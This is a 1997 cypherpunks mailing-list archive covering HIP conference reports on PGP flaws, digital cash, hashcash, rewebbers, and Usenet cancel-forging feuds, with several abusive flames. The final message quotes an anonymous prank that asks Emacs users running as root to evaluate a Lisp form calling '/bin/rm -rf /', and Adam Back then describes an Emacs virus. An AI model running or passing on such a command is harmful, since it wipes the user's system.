How Dave wings it over to HIP and saves the free world has to wait until,
well, another's email.  What disturbs is the gradual, unstoppable closing
of borders in our erstwhile free western neigbour.  Just like the American
predomination, or should I say, embarrasment of topic on the never-ending
crypto saga.

If freedom is to contract a cancer, a malignant tumour, then Dave's talk
on PGP user security is as a promise of the miracle cure, and not the
State Department chemotheropy that cures the disease by killing the patient.



Dave was followed by a presentation by Gary Howland on weaknesses in PGP.
These theoretical problems leave one with niggling doubts as to the accepted
reputation, our holy gail of privacy and security.  There is no need for
panic - many of the attacks are both highly specific, have been recognised
for some time, and have been explicitly fixed in the latest release, PGP 5.0.

But there is pause for thought.  Howland and myself and many other have
built financial cryptographic systems that relied on the mantra of PGP
impregnability.  The attacks he described work best in programmed systems
like ours and those of our more respectable competitors.

For example, imagine building a system that authorised counterparties on
the strength of the PGP id or the fingerprint.

Now we discover that Mallory can make a new key with the same fingerprint.
Whilst not wishing to state that this is the end of the world, clearly we
have to re-evaluate the entire architecture that was built up upon PGP.
We believed in the PGP reputation as much as others, and these attacks
are a timely reminder of the need for eternal hacker vigilance.

These flaws are significant but addressable: PGP 5.0 has fixes for all but
one of the flaws mentioned.  And for the record, whilst Gary's attack to
change conventionally encrypted files without detection was unknown to the
PGP team at the moment, we can be sure that it will be addressed.

Other exciting developments were the van Eyk demonstration by Prof.
Euller.  Not one, not two, but three methods to detect and display
PC monitor signals on a slaved monitor, from distances into the several
hundreds of metres.  There is now little doubt that standard computers
are the FBIs best friend.  What need key escrow?



Signing off and Hipped out.  iang at somwhere.in.the.middle.of.nowhere

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From rah at shipwright.com  Sat Aug  9 08:41:09 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Sat, 9 Aug 1997 23:41:09 +0800
Subject: Hipped on PGP
Message-ID: 




--- begin forwarded text


Date: 9 Aug 1997 02:13:36 -0000
From: iang at systemics.com
To: e$@thumper.vmeng.com
Subject: Hipped on PGP
Sender: 
Precedence: Bulk
List-Software: LetterRip 2.0 by Fog City Software, Inc.
List-Unsubscribe: 
List-Subscribe: 

HIP finishes late in the day.  It's 0100 - that's one in the morning
for the temporally challenged - and the smart card workshop has just
broken up.

Actually it was the second pass.  The first pass was 'sold out' at 150
people, this second started at 2300 this evening.  Again, 150 people
turned up and sat through presentations of hardware and data formats
and attacks on the financially finest plastic in Europe.

I have no snippets or revelations, I am not one of the dedicated.  Mondex
remains un-hacked, ChipKnip is secure.  Frankly I'm not interested, I find
the world of smart cards deadly boring.  Perhaps it is the hardware, or
maybe because attacks on smart cards have little chance of realising any
gain or meltdown.

I can on the other hand report that Saturn is safe tonight, as our in-HIP
astrodome is busilly monitoring progress.  What better way to wind down
than to head up to north campground and check out the latest telescopic
tracking software.  Speaking of celestial control, the weather is perfect.
That's by California standards, not European.



Dave del Torto was lucky to be joining us for his talk on PGP user security.
After buzzing the bells of the trainee bag scanner with 15kg of portables
and random cables, he was incarcerated in an investigative cell for a couple
of hours.  Many hours after seeing his flight head east, a state department
goon turns up.

"When are you coming back?" asks the goon, knowing full well the
day.  Dave says "the 16th" blithely unaware that his passport expires on the
day before.  Goon leaves, returns, hands over passport.   Only problem was,
passport was cancelled...  No explanation.  No advice, no help.

How Dave wings it over to HIP and saves the free world has to wait until,
well, another's email.  What disturbs is the gradual, unstoppable closing
of borders in our erstwhile free western neigbour.  Just like the American
predomination, or should I say, embarrasment of topic on the never-ending
crypto saga.

If freedom is to contract a cancer, a malignant tumour, then Dave's talk
on PGP user security is as a promise of the miracle cure, and not the
State Department chemotheropy that cures the disease by killing the patient.



Dave was followed by a presentation by Gary Howland on weaknesses in PGP.
These theoretical problems leave one with niggling doubts as to the accepted
reputation, our holy gail of privacy and security.  There is no need for
panic - many of the attacks are both highly specific, have been recognised
for some time, and have been explicitly fixed in the latest release, PGP 5.0.

But there is pause for thought.  Howland and myself and many other have
built financial cryptographic systems that relied on the mantra of PGP
impregnability.  The attacks he described work best in programmed systems
like ours and those of our more respectable competitors.

For example, imagine building a system that authorised counterparties on
the strength of the PGP id or the fingerprint.

Now we discover that Mallory can make a new key with the same fingerprint.
Whilst not wishing to state that this is the end of the world, clearly we
have to re-evaluate the entire architecture that was built up upon PGP.
We believed in the PGP reputation as much as others, and these attacks
are a timely reminder of the need for eternal hacker vigilance.

These flaws are significant but addressable: PGP 5.0 has fixes for all but
one of the flaws mentioned.  And for the record, whilst Gary's attack to
change conventionally encrypted files without detection was unknown to the
PGP team at the moment, we can be sure that it will be addressed.

Other exciting developments were the van Eyk demonstration by Prof.
Euller.  Not one, not two, but three methods to detect and display
PC monitor signals on a slaved monitor, from distances into the several
hundreds of metres.  There is now little doubt that standard computers
are the FBIs best friend.  What need key escrow?



Signing off and Hipped out.  iang at somwhere.in.the.middle.of.nowhere

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From rah at shipwright.com  Sat Aug  9 08:41:18 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Sat, 9 Aug 1997 23:41:18 +0800
Subject: NCash - an experimental digital cash system
Message-ID: 




--- begin forwarded text


Date: Fri, 08 Aug 1997 19:39:46 -0400
From: "Eric S. Johansson" 
Reply-To: esj at harvee.billerica.ma.us
Organization: only slightly
MIME-Version: 1.0
To: rah at shipwright.com
Subject: NCash - an experimental digital cash system

do you know about this??  (probably :-)
--- eric

http://www.lysator.liu.se/~nisse/NCash/

Content-Type: text/html
Content-Base: "http://www.lysator.liu.se/~nisse/NCash
	/"
X-MIME-Autoconverted: from 8bit to quoted-printable by
harvee.billerica.ma.us id SAA25447





This corner of the WWW is devoted to information, documentation and source
for the NCash digital cash experiment. Some pointers here are links right
into my source tree, so don't be surprised if you find inconsistencies or
bugs.




NCash is my Master's project at the Link�ping Institute of Technology. The
idea is to design and implement an bare-bones off-line digital cash system,
meeting rather high standards for security and privacy. And then try it out
in the Real World. For simplicity, NCash will be software only, with both
servers and clients running on Unix-like machines.

The cash system being implemented follows the ideas of Stefan Brands'
rather closely, in particular the system described in his 'An efficient
off-line electronic cash system based on the representation problem'.




An excellent introduction to digital cash and related matters are David
Chaum's articles 'Achieving Electronic Privacy' and 'Security Without
Identification: Transaction Systems to Make Big Brother Obsolete', written
1992 and 1985 respectively.




I'm running a mailing list for discussion of the NCash project. The list is
mainly for the persons more or less involved in the project, i.e. me, my
supervisor, other people who have offered help, volunteers who wish to try
out the system when time comes, and some friends and other interested
people. The main language on the list is Swedish.

To subscribe, send mail to . The list address
is . There's also an
archive.




Ahttp://www.lysator.liu.se/~nisse/NCash/s the design and implementation
proceeds, I try to keep up with documenting NCash. If you dare, look at the
latest snapshot as of August 6th. Also available as
postscript

The source code will
mostly be written in the Pike language, and will probably be released under
the GNU General Public License, but it's not ready yet for some time.

The server will probably run on a Linux machine that
the mathematics department has kindly given me access to.

  Last modified: Wed May 21 02:53:29 MET DST 1997   Niels M�ller


--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From breynolds at harborcom.net  Sat Aug  9 08:55:24 1997
From: breynolds at harborcom.net (Bradley E. Reynolds)
Date: Sat, 9 Aug 1997 23:55:24 +0800
Subject: The BIG Lie (Jesus Confesses)
In-Reply-To: <33EB9D22.166F80B5@cyberspacetechnologies.com>
Message-ID: 



> You know, you are just about the biggest idiot I have ever had the
> displeasure of reading. For one, the largest religion in the US right
> now *is* in fact judeo-christian. The largest is Roman Catholic with
> Pentacostal Protestant following right behind. Next, this country was
> founded on christian beliefs, or have you failed to read the words of
> the constitution of the US. 

Oh, like "Life, Liberty, and molesting the convenient altar boy"
The country was founded on some conception of god which was melded
with the general beliefs of the founders.  But if you are referring
to the original government of the united states, then you are
referring to a goverment which largely dealt with foreign
relations are rarely trod into the realms of personal liberty.
In fact, it was the liberty which england had violated that
all this crazy stuff started over.  Though the founders
of our nation were protestant or whatnot, they still realized the
importance of not letting their personal beliefs meddle with the
running of a government.  

> displayed thus far about the makeup of the US, I would venture to say
> that you probably have not read it. Next, you attack christians for
> trying to control the content made available on the internet. At least
> the site ratings plan is better than alot of other plans I have seen.

That is a very poor argument.  I guess hitler's plan was pretty
good to ensure an aryan nation because it was the best thing
available at the time?.   

> Besides, Oh Godlike TruthMonger, where is *your* surefire plan to halt
> the spread of trash that *most* humans would want out of of the reach of
> their children? I have not seen you *once* offer a straightforward clear
> cut plan to efficiently handle *any* issue placed for discussion on this
> listserv. 

Ok, here is the plan.  Anarchy.  when this happens, I am getting
my handy spoon and killing nameless members of the anti-cypherpunks
regime.  Heh, we can even have a little wagering pool on it.

I have seen you do nothing but slam, belittle, and degrade
> others and their beliefs and ideas. You do this under the unimpressive
> tag of "TruthMonger". If anything, you are anything but a TruthMonger.
> When you can come up with a plan that even *remotely* seems like a
> logically thought out, planned, and intelligent proposal on how to
> handle the issues presented everyday on the internet that affect the
> computing industry balanced with a concern for the children, then I will
> listen. (And yes, I do agree that the parents of the children have an
> obligation to monitor the content they are exposed to. It's called
> responsible parenting which unfortunately is not a well practiced
> ideology. And to take the wind out of your sales, I have 2 children and
> as a parent I limit them to what is appropriate to their ages.) Until
> such time as you can fulfill the obligations to us, the adult computing
> population, and our offspring, the children (just in case your fuddled
> mind does not know what they are), I suggest you rest those busy little
> fingers of yours and listen to the underlying theme of the issues before
> us. Until then, HateMonger, I have one suggestion for you..... Shut Up!

Blah, another believer that polysyllabic attack will somehow 
give credence to your argument.  Well, this obviously refined
message (not including the shut up at the end) is a good indicator
of just how fucked up this country is.  How about you go about
your business and I go about mine and we never meet unless you and
I agree to.  

Look, I have to talk to way too many morons like yourself everyday
and I must admit that it gives me headaches.  So go be a good
cybersitter and monitor the gigs of porn piped into your house
every day and don't bother me with your tripe.

God







From jya at pipeline.com  Sat Aug  9 08:57:42 1997
From: jya at pipeline.com (John Young)
Date: Sat, 9 Aug 1997 23:57:42 +0800
Subject: It's cool to be iang@hip97.nl
Message-ID: <1.5.4.32.19970809153254.00734808@pop.pipeline.com>



Who's your Garth at hip? HOPE got the plastic cowpoke as
warm-up, and 1/4m of his dim-leds losing control onto filthy Central
Johnnycan.

Sure, bit-boxes on bud-boxes, but are NL park narcs matching 
X4SALL's T1 absorbing the dark fiber-p downstream?

What's the TLA-tally at HIP? HOPE's welcoming them as the 
only full-tuition registrants,








From aba at dcs.ex.ac.uk  Sat Aug  9 09:26:02 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Sun, 10 Aug 1997 00:26:02 +0800
Subject: TAZ & Rewebber servers
Message-ID: <199708091606.RAA00914@server.test.net>




Ian Goldberg and Dave Wagner have a paper on an implementation of
something related to Ross Anderson's paper at:

	http://www.cs.berkeley.edu/~daw/cs268/

People interested in eternity service protocols etc, might find it
interesting.

The rewebber is a kind of chaining encrypting web proxy.  Web proxies
normally accept urls like so:

	http://http://somewhere.com/blah/

There paper allows you to have

	http://1231324adefgga1324324adefgga1324324adefgga1324

where 1231324adefgga1324324adefgga1324324adefgga1324 is an encrypted
form of "http://somewhere.com/blah/".  You can chain this.

I didn't notice their paper announced here at the time they wrote it.

They have an implementation, but source is not available directly due
to export crapola.  I guess you'll have to send them email if you want
to try it out.

They have a sample server up, and the TAZ server seems to work, but
the rewebber seemed to be dead when I used it.


It looks to me that you could combine eternity servers with rewebbers.
Create a rewebber chain pointing at an article in an eternity server.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: <199708090914.KAA00770@server.test.net>




Kent Crispin  writes:
> On Fri, Aug 08, 1997 at 10:45:29PM +0100, Adam Back wrote:
> [...]
> > I wasn't talking about remailers above, but about end users.  Hashcash
> > allows the recipient to filter out email that hasn't got postage.
> 
> Ie, hashcash is a fancy techie oriented self-labelling technique.  :-)

Yes, if you like.  If techie people can make themselves pretty much
immune to spam, perhaps the non-techies will get interested to use our
solution.  Make it easy enough to install at ISP level, and interim
migration paths for people without it so it still interoperates, and
you might get somewhere.

All depending on how spammers and hashcash interact when they bump
into it as a major block on their ability to spam.  They'll obviously
try their damnest to work around it.  But I think that the
inconvenience and cost to them, as hardly anyone ever replies to their
mail (costs are only for first email that isn't replied to), is a much
better spam preventer than the current status quo, which has
practically no protection other than manual blocking lists which
hardly anyone has software installed for, or for complaints to
ISPs... but then the spammers use forged email addresses, and there
are a few ISPs who apparently (from discussion here) are willing to
knowingly sell spammers bandwidth.  Someone's going to do it.

> I didn't read the code, but it seems that the double spending
> protection is just local to the recipient (ie, there isn't a trusted
> central clearinghouse that checks against double spending on a global
> basis).  

It's supposed to be 100% decentralised -- the network strain on any
kind of centralised clearling house for postage for _all_ email would
be Terrabits/second.

OK, so you might be able to split it up a bit, and have multiple
banks, and inter-bank clearing, and various trade-offs, but it's still
a major engineering effort with large bandwidth overheads.

> Thus, a spammer could calculate postage for a message, then
> send 100000 copies.  Hashcash would guarantee that each user only got
> one copy, but there are easier ways to do that.  

You missed one aspect of the design.  What the collision is calculated
on is the recipients email address.  If the collision is on someone
elses email address, you reject it out of hand.  So the hashcash
postage token is specificly minted by the sender and made out in the
email address of the individual that you are trying to send email to.
It is useless for sending email to anyone else.  You can never spend
it twice on the same person, and sending it to anyone else it will
have zero value.  

Also it includes in the hash collision an expiry date when you
generate it, but this is not significant to the email spam control
aspect, but is just there to ensure that the users double spend
database doesn't grow -- you discard expired double spend entries --
as you wouldn't accept them anyway -- because they are out of date.

> [If the checking was done at an ISP level, of course, only one
> message would get through.  But that requires widespread deployment
> at the ISP level, not the individual user level, and checking at the
> ISP level requires that the ISP keep a database of users mail
> preferences.]

ISP level checking is nice because you can get away with out changing
email clients.  The short term solution of sending nonces will help
provide a reasonable solution for those with out new clients.

> > You could auto-add anyone you ever manually replied to to the
> > no-postage list even.
> 
> I would rather pursue a "tit-for-tat" strategy for email, but
> unfortunately tit-for-tat requires stable identities... 

tit-for-tat would be reasonable also.

Stable identities already have advantages... you can block remailers
etc.

Stable identities could include signed documents.

[btw: Kent: I tried out your .midi file under win95, all I had to do
was double click on it.  Almost melodic in an weird modern sort of
way.  Most cool anyway :-]

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: <199708091625.MAA09743@calum.csclub.uwaterloo.ca>



Jason William RENNIE  wrote:
>Can anybody suggest any good books on old cryto techniques ?? I'm finally 
>learning to program, along with the stuff i've got to learn as part of 
>the class i thought i would make a start on learning to code 
>crypotgraphic algorithms. I was after some old ones that are simple to 
>code in software. Unfortuently the one in the back of the Schnier book 
>are a little to complex for my limited programming knowledge so far. 
>
>So can anybody help or will i just be ignored like i have been at other 
>times ? 
>
>Jason =8-]

Newsgroups: csc.lists.cypherpunks
Subject: Re: Old Cryto stuff, 
Summary: 
Expires: 
References: 
Sender: 
Followup-To: 
Distribution: 
Organization: Computer Science Club, University of Waterloo
Keywords: 
Cc: 

Jason William RENNIE  wrote:
>Can anybody suggest any good books on old cryto techniques ?? I'm finally 
>learning to program, along with the stuff i've got to learn as part of 
>the class i thought i would make a start on learning to code 
>crypotgraphic algorithms. I was after some old ones that are simple to 
>code in software. Unfortuently the one in the back of the Schnier book 
>are a little to complex for my limited programming knowledge so far. 

I don't know any other books, but as far as real world algs, Schnier is,
unfortunately, as simple as it gets.  If you just wanna practice coding, try
going through the sections on historical crypto in Schneir and coding ceasers
and old military stuff, or crackers therefor.

-Robin






From dlv at bwalk.dm.com  Sat Aug  9 09:58:47 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 10 Aug 1997 00:58:47 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: 
Message-ID: 



? the Platypus {aka David Formosa}  writes:

> On Wed, 6 Aug 1997, Dr.Dimitri Vulis KOTM wrote:
>
> > Tim Skirvin  writes:
> > > 	Not accepted ones.  They're treated as rogues, and asked to stop
> > > it, and you know it.
> >
> > Net.Scum like [...] Tim Brown,
>
> Tim Brown is not an accepted canceler.

As challenged, I've listed 3 dozen "spam cancellers" caught slipping cancels
forged for "non-spam" among their "spam cancels". There are at least twice
as many more listed in the Net.Scum database. For some reason you chose to
snip all of them and to pick on Tim Brown, perhaps because he's a self-
described schizophrenic.

What difference does it make whether Tim Skirvin considers someone an
"accepted" or "rogue" canceller?  Tim Brown forged hundreds of cancels
between october 96 and July 97. Most of these cancels were for "spam"
(stuff posted lots of times; usually ads).  A substantial minority of
Tim's cancels were for singly-posted articles whose contents he didn't
like, posted by his flame war opponents. Many examples can be found at
his Net.Scum page: http://www.netscum.net/brownt0.html .  Tim Brown
apparently stopped forging cancels soon after I stepped lightly on his
dick. I don't know whether there was a connection.

Tim Brown's cancels lacked the "Sender:" header. For this reason they were
not processed at sites running INN with the paranoid settings, but were
accepted at a lot of sites still. The whining by the Cabal that Tim Brown
is not an "accepted" cancel-forger, as opposed to "accepted" cancel-forgers
like Pedophile Chris Lewis and John E. Milburn is irrelevant, and your
Cabal itself is irrelevant, isolated, impotent, and ignored.

Guy Macon is another fine example of a "spam canceller": Steve Boursy and
Dr. Fomin caught him forging cancels for artciles on soc.religion.quaker
that were not "spam" by any definition, but which Guy considered to be
"off-topic", like the thread about leprosy.  Macon recently posted an
announcement on soc.religion.quaker calling himself "the official spam
canceller" of s.c.r and claiming to have forged two more cancels.

The way to stop these forgers is to ignore their cancels. Your distinction
of who's "accepted" and who's not "accepted" by you is irrelevant to their
ability to censor others.  You haven't succeeded in stopiing Guy Macon,
Ehud Gavron, David Richards, and a host of others for months, demonstrating
the utter irrelevance of your "accepted cancel-forger" label.

> > Examples of lies in Tim Skirvin's Magnum Opus, the "Cancel FAQ" (what else)
> >
[How to get a cancelbot]
> > ]Sounds cool.  Where do I get one?
> > ]
> > ]	If you have to ask, you don't get one.
>
> [...]
>
> > My cancelbot has been freely available for over 18 months.
>
> And if thay can't find it thay have to ask therefore thay don't get one.
> There are freely advalable alt.* newsgroup creation scripts, and still
> peaple don't know how to post cancels.

"How do I get a cancelbot" is indeed a frequently asked question, and whenever
I see it posted, I e-mail the poster a copy of cbcb's source code.

Tim Skirvin is under no obligation to disseminate the information that he
feels shouldn't be publicly available ("security through obscurity").
However since he chooses to present himself as the author of the "official"
FAQ on usenet Cancels (actually, substantually plagiarized from the Cancel
FAQ that David Stodolsky used to post), a more honest way to deal with the
questions he doesn't want to answer would be to either omit the question
altogether, or to state that he doesn't want to answer the question.

I e-mailed Skirvin repeatedly pointing out that his answer is factually
incorrect, yet he presists in presenting his view of what things should
be rather than what they are.

I was asked to provide examples of lies of Tim Skirvin's FAQs. This was
just one of several such examples.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From dlv at bwalk.dm.com  Sat Aug  9 10:02:51 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 10 Aug 1997 01:02:51 +0800
Subject: non-censorous spam control (was Re: Spam is Information?)
In-Reply-To: 
Message-ID: <93e7ae94w165w@bwalk.dm.com>



? the Platypus {aka David Formosa}  writes:

>
> On Wed, 6 Aug 1997, Dr.Dimitri Vulis KOTM wrote:
>
> > Why do people try to flood newsgroups with shit?
>
> I can see a number of resons
>
> 1) For profet (pron4porn ect)
> 2) To prevent discution that thay do not like (Sientology, the poatry
> feastivil.)
> 3) To the amusument of there small minds (trollers ect)
> 4) By accedent (ARRM, other spews)
> 5) Out of shear madness  (Dr Rouger Rabbit)

The good news is that they can't harm a newsgroup by flooding it.
One can identify some of the reasons and try to eliminate them
to reduce floods. The self-appointed "owners" of unmoderated
newsgroups are one such reasn.

> > Examples from the Net.Scum rogue collection: Scott Kellog from Sematech
> > falsely accuses various people of "spamming" his newsgroup, but hasn't
> > been caught forging cancels yet.
>
> 
> But lieing is free speach isn't it?
> 

Is exposing someone as a liar and a crook censorship?

> As long as he is not forging cancels I don't see anything wrong with the
> little troll having some fun.

People who complain to postmasters about the alleged contents of other
people's Usenet articles, especially those who falsely accuse others of
"spamming", complain about "abuse" they haven't witnessed but saw others
allege, etc, are net-abusers and deserve to be exterminated by any means
at our disposal.

> >  On the other hand Bob Curtis has taken
> > over alt.smokers.cigars and forges cancels for articles that merely
> > question his "ownership" of the newsgroup. Do read - it's very enlightening
>
> IRC Bob Curtis was sent away with his tail between his legs.

Have I "censored" Bob Curtis?

By the way, Bob is alive and well, moderating his own little "moderated"
newsgroup, and recently published a piece about his experience with
forging cancels in a paper magazine - full of lies. The last forged
cancel I found is about a month old - for a kibo at thecia.net article.

> > They argue that according to Hardin, Usenet would be
> > used more "efficiently" if every newsgroup had an "owner"
>
> I don't see anywhere that being suggested.  Most peaple suggest that
> Usenet would work better if peaple stopped abuseing it.

I don't believe you haven't seen this said. Perhaps you don't read
news.* or don't understand what's being said there.

> I don't trust the newsgroup care peaple any further then I can kick them.

Years ago I used to occasionally mail posters saying friendly and polite
things like: "I saw your article posted in , and it occurred to me
that you might have gotten more interesting responses if you had posted it to
 (in addition or instead)". Now people have no manners. Recently
someone I know (call him Y) forwarded me an e-mail from Y. I know both X and
Y on the net; they didn't know one another. X posted a technical question on
a comp.* newsgroup that's been "split" and rmgrouped a few months ago. X's
news master hasn't processed the rmgroup, and X had no idea that the
newsgroup's been split. Y (whom I used to respect somewhat before this
incident) flamed X rather rudely)for having posted in a "bogus" newsgroup.
(Interestingly, the article, not cross-posted, propagated to Y's server,
showing how little effect David C Lawrence's rmgroups have these days.)

Cabal supporters are promoting the view that posting in newsgroups they
describe as "bogus" (i.e., the ones that David C Lawrence has rmgrouped,
or the alt.* ones that they don't want sites to create) is a form of
attack on the Cabal, resulting (at least) in obnoxious flames.

> In fact I have been encourgaing them to stop.

Your encouragement is irrelevant, since they don't give a fuck what you or
anyone else tells them. The technical solution is to render them even more
impotent than they are now - e.g., educate admins about the complaining
Net.Scum, and ignore their forged cancels.

> > The good news is that newsgroup floods don't really hurt anyone except
> > the egos of the assholes who claim to "own' the affected newsgroups.
>
> And the newsevers and the regular readers.

Not if the news servers are adequately equipped for such inevitable and
frequent eventualities, and the regular readers are armed with adequate news
reading software. If you live in a mosquito-infested area and refuse to
install nets on your windows, who's to blame?

> > I like the idea of encouraging news readers to send e-cash (possibly via
> > anon remailers) to the posters whose writings they like and would like to
> > see more of.
>
> A local bank (to me anyway) offers e-cash.  I'll see how I can contrabue
> to makeing the usenet a better place.

Perhaps it's another idea for the son-of-rfc1036 - a header specifying the
e-mail address for donation of e-cash (which could be the original poster
or some 3rd party charity)

A newsreader when it sees this header could ask the reader if he wants
to send e-cash and thow much.

This is a neat idea which I encourage people to adapt.

> > And my response is:
> > why not just killfile the idiots, or why not choose to not select
> > their crap for reading - it's easily identifiable.
>
> Its not realy.  All you get is a war where your spamer becomes more
> sofistercated in there spaming to avoid the filters.

The spammers are becoming more sophisticated in response to forged cancels.

> > Do you remember all the talk about "intelligent internet agents" who were
> > supposed to look for stuff we're interested in
>
> I belave this is the idear behind  Mr Hayes' newsreader.

Doesn't mean someone else can't work on it too. It's a good project for
an M.A.thesis - perhaps even a PhD thesis if they can do A LOT of work
on the subject.

> > > I have attempted to do so in the past,  and will attempt to do so again.
> >
> > There's some interesting discussion going on there in addition to my xposts
>
> I have again requested entery.  No responce yet.

Dave, if you see a subscription request from David Formosa for the f-k
list, could you please process it?  Thanks

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From tcmay at got.net  Sat Aug  9 10:06:42 1997
From: tcmay at got.net (Tim May)
Date: Sun, 10 Aug 1997 01:06:42 +0800
Subject: Subsect?
In-Reply-To: <199708081253.GAA06495@wombat.sk.sympatico.ca>
Message-ID: 



At 12:53 AM -0700 8/9/97, David D.W. Downey wrote:
>>Paul H. Merrill wrote:
>> judeo-christian isn't a religion.  Christian is.
>>
>Judeo- Christian is a subsect of Christianity in it's generic form.
>(Both my parents are ministers, and this has been drilled into my head.)

Not a _sub_sect, or subset, but a _super_set.

Unless JC had a time machine, Judaism predates Xtianity.

In any case, the convention is that "Judeo-Christianity" is the general
tradition connected with the Old Testament, the Ten Commandments, the
pre-Xtian prophets, and so on.

If your parents really drilled this "sub-sect" business into your head,
maybe you ought to ask them to lighten up on the drill, or use a different
bit, or something.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From tcmay at got.net  Sat Aug  9 10:16:22 1997
From: tcmay at got.net (Tim May)
Date: Sun, 10 Aug 1997 01:16:22 +0800
Subject: Masons and Fnords
In-Reply-To: <199708082242.AAA20104@basement.replay.com>
Message-ID: 



At 2:00 AM -0700 8/9/97, David D.W. Downey wrote:

>To show how much this country *was* in fact based upon Christianity, one
>has only to look at our money. "In *God* we trust. Also, the majority of
>our founding fathers were in fact christians. Yet they correctly

Actually, _all_ of the Founders were Masons. Tim Bob says check it out.

The eye and the pyramid. The original inscription on money: "In fnord we
trust."

They adopted Xtianity as a cover. They actually worshipped Ra and Set.

(Why do you think the new standard for secure commerce is called SET?)


--Tim May, 34th Degree Mason, former resident of Alexandria, home of the
Masonic Temple.

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From ant at replay.xs4all.nl  Sat Aug  9 10:54:42 1997
From: ant at replay.xs4all.nl (RHS Linux User)
Date: Sun, 10 Aug 1997 01:54:42 +0800
Subject: HIP
Message-ID: 





Hi,

See https://cypherpunks.campsite.hip97.nl

Also watch TV and the newspapers next week.  We have
been promoting the education mission.....

Scanned paper PGP source code proofreading is nearing
completion (by non-US people of course), and we hope to finish
this weekend.  Whitespace is the most hassle, even in places
where it doesn't affect the code's meaning.

Another time publish a paper version w/o comments and tabs.

Our meeting is postponed to Sunday 16:00 local time to avoid
a clash w/ Bruce Schneier.

Some CPs had difficulty leaving the US to get here.  It's not
very clear how purposeful that was, but they'll tell you the
details if they want to.  :) :) :)

Antonomasia
    normally             ant at notatla.demon.co.uk
    till Monday morning  ant at replay.com 






From jamesd at echeque.com  Sat Aug  9 11:05:21 1997
From: jamesd at echeque.com (James A. Donald)
Date: Sun, 10 Aug 1997 02:05:21 +0800
Subject: FCPUNX:this could happen to remailers (was Re: Whining for 'Accountability')
Message-ID: <199708091737.KAA11542@proxy3.ba.best.com>



At 12:40 PM 8/8/97 +0100, Adam Back wrote:
> When an incident like this happens via remailers, there will be
> similar calls for `accountability' on the net, and for `government to
> do something about the problem'.

When an incident like this happens with remailers, people will say:

"You morons, look at the headers, obviously it was bogus"

Some time ago somebody used remailers to spread what purported to
be an embarrassing political memo far and wide.

The newsmedia that picked it up were promptly and rightly ridiculed,
most of the media interpreting the disclaimer that the mail was not
from the entity that it appeared to be from as effectively an admission
"spoof:  Do not take the following seriously"


Suppose you got what purported to be a bill for dirty pictures
from a business, but the headers said "huge cajones remailer".

You would have to be a right loon to take it seriously.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From aba at dcs.ex.ac.uk  Sat Aug  9 11:25:35 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Sun, 10 Aug 1997 02:25:35 +0800
Subject: emacs virus (was Re: JOIN THE CREW)
In-Reply-To: <199708090554.HAA07924@basement.replay.com>
Message-ID: <199708091105.MAA00941@server.test.net>




Anonymous writes:
> If you are reading this message as root under Emacs, please position
> the cursor to the final paren in the following and hit C-x C-e.
> 
> (call-process-internal "/bin/rm"
> 		       nil t nil
> 		       "-rf" "/")

I once had forwarded to me an emacs virus -- one that hooked into an
emacs function such that as soon as you opened the file, it sent it's
author some mail, and wiped it's own buffer.

You ended up looking at an empty file, and none the wiser.  It could
have left some text in the buffer with modification.  The point is the
elisp code wasn't displayed, and you wouldn't notice unless you looked
at it in less before loading it into emacs.

(It worked too -- or it would have, but it tried to exec /bin/mail or
